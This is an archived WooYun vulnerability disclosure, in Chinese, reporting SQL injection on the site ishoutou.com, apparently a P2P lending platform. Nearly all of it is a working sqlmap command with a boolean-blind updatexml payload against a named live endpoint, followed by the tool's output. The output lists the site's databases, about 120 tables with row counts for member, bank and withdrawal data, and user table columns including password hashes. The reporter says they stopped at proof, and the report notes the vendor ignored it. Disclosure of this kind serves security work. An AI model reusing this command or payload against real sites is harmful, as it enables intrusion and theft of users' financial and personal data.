乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开
我听说老板发iPhone 6plus?主站注入 另泄露商城数据库
注入:
python sqlmap/sqlmap.py -u "https://www.ishoutou.com/home/feedback/doDel" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=10 --current-user
sqlmap identified the following injection points with a total of 11 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0available databases [4]:[*] ecshop2015[*] information_schema[*] mysql[*] shoutouwangsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current database: 'shoutouwang'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0Database: shoutouwang[120 tables]+-------------------------------+| lzh_9yue || lzh_acl || lzh_activity_diy || lzh_activity_diy_log || lzh_ad || lzh_applylog || lzh_area || lzh_article || lzh_article_area || lzh_article_category || lzh_article_category_area || lzh_auser_dologs || lzh_ausers || lzh_auto_borrow || lzh_bank_list || lzh_borrow_info || lzh_borrow_info_lock || lzh_borrow_investor || lzh_borrow_tip || lzh_borrow_verify || lzh_borrow_vouch || lzh_comment || lzh_current_info || lzh_current_investor || lzh_donate || lzh_enterprise || lzh_face_apply || lzh_feedback || lzh_friend || lzh_friend_copy || lzh_friend_copy1 || lzh_global || lzh_handler || lzh_hetong || lzh_homsuser || lzh_id5log || lzh_inner_msg || lzh_interface_token || lzh_invest_credit || lzh_invest_detb || lzh_investor_detail || lzh_izhubo || lzh_jifen_choujiang || lzh_jubao || lzh_k_invest || lzh_k_loan || lzh_kvtable || lzh_llpayinfo || lzh_llpaylog || lzh_llpaypost || lzh_loan || lzh_market_address || lzh_market_goods || lzh_market_jifenlist || lzh_market_log || lzh_media || lzh_member_address || lzh_member_alipay || lzh_member_apply || lzh_member_banks || lzh_member_borrow_show || lzh_member_contact_info || lzh_member_creditslog || lzh_member_data_info || lzh_member_department_info || lzh_member_ensure_info || lzh_member_financial_info || lzh_member_friend || lzh_member_house_info || lzh_member_info || lzh_member_integrallog || lzh_member_limitlog || lzh_member_login || lzh_member_money || lzh_member_moneylog || lzh_member_msg || lzh_member_ou || lzh_member_payonline || lzh_member_remark || lzh_member_safequestion || lzh_member_to || lzh_member_withdraw || lzh_member_yott || lzh_members || lzh_members_status || lzh_name_apply || lzh_navigation || lzh_oauth || lzh_payment_log || lzh_promote || lzh_promote_other || lzh_qq || lzh_recommendlog || lzh_redbag || lzh_redbag_list || lzh_rongzi || lzh_sendlog || lzh_shares_additional || lzh_shares_apply || lzh_shares_global || lzh_shares_holiday || lzh_shares_lever || lzh_shares_rateconfig || lzh_shares_record || lzh_shares_supply || lzh_shares_type || lzh_smslog || lzh_sys_tip || lzh_tmplog || lzh_today_reward || lzh_transfer_borrow_info || lzh_transfer_borrow_info_lock || lzh_transfer_borrow_investor || lzh_transfer_detail || lzh_transfer_investor_detail || lzh_verify || lzh_video_apply || lzh_vip_apply || lzh_yott_log || lzh_yott_money_log |+-------------------------------+Database: shoutouwang+---------------------------+---------+| Table | Entries |+---------------------------+---------+| lzh_tmplog | 136820 || lzh_member_moneylog | 115837 || lzh_sendlog | 85064 || lzh_member_login | 84250 || lzh_redbag_list | 40000 || lzh_inner_msg | 38826 || lzh_auser_dologs | 36153 || lzh_members | 34000 || lzh_members_status | 33195 || lzh_member_info | 32846 || lzh_member_money | 26282 || lzh_activity_diy_log | 18592 || lzh_investor_detail | 18396 || lzh_member_payonline | 15986 || lzh_llpaylog | 11644 || lzh_borrow_investor | 11267 || lzh_name_apply | 10035 || lzh_member_integrallog | 9857 || lzh_interface_token | 7637 || lzh_yott_log | 7381 || lzh_member_banks | 6470 || lzh_member_creditslog | 5008 || lzh_member_ou | 4973 || lzh_member_withdraw | 4511 || lzh_area | 3412 || lzh_llpaypost | 3333 || lzh_promote_other | 2282 || lzh_id5log | 1722 || lzh_llpayinfo | 1334 || lzh_recommendlog | 801 || lzh_member_yott | 529 || lzh_borrow_info | 464 || lzh_borrow_info_lock | 464 || lzh_borrow_verify | 464 || lzh_yott_money_log | 451 || lzh_activity_diy | 433 || lzh_article | 330 || lzh_verify | 215 || lzh_member_limitlog | 210 || lzh_today_reward | 129 || lzh_promote | 84 || lzh_auto_borrow | 80 || lzh_member_to | 46 || lzh_global | 38 || lzh_article_category_area | 30 || lzh_article_category | 29 || lzh_navigation | 27 || lzh_bank_list | 21 || lzh_ausers | 19 || lzh_applylog | 12 || lzh_izhubo | 12 || lzh_shares_global | 12 || lzh_media | 11 || lzh_ad | 10 || lzh_acl | 9 || lzh_friend | 8 || lzh_friend_copy | 6 || lzh_friend_copy1 | 6 || lzh_qq | 5 || lzh_shares_lever | 5 || lzh_shares_rateconfig | 5 || lzh_vip_apply | 5 || lzh_shares_type | 4 || lzh_9yue | 1 || lzh_redbag | 1 |+---------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0Database: shoutouwangTable: lzh_members[30 columns]+-----------------+------------------------+| Column | Type |+-----------------+------------------------+| active_integral | int(15) || area | int(10) unsigned || city | int(10) unsigned || credits | int(10) || customer_id | int(10) unsigned || customer_name | varchar(20) || ent | tinyint(1) || id | int(10) unsigned || integral | int(15) || invest_credits | decimal(15,2) unsigned || is_ban | int(11) || is_borrow | int(2) || is_transfer | int(2) || is_vip | tinyint(3) || last_log_ip | char(15) || last_log_time | int(10) || pin_pass | char(32) || province | int(10) unsigned || recommend_id | int(10) unsigned || reg_ip | varchar(15) || reg_time | int(10) unsigned || reward_money | decimal(15,2) || tid | int(11) || time_limit | int(10) unsigned || user_email | varchar(50) || user_leve | tinyint(4) || user_name | varchar(50) || user_pass | char(32) || user_phone | varchar(11) || user_type | tinyint(3) unsigned |+-----------------+------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'shoutouwang@%'
以证明 不深入
升级
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
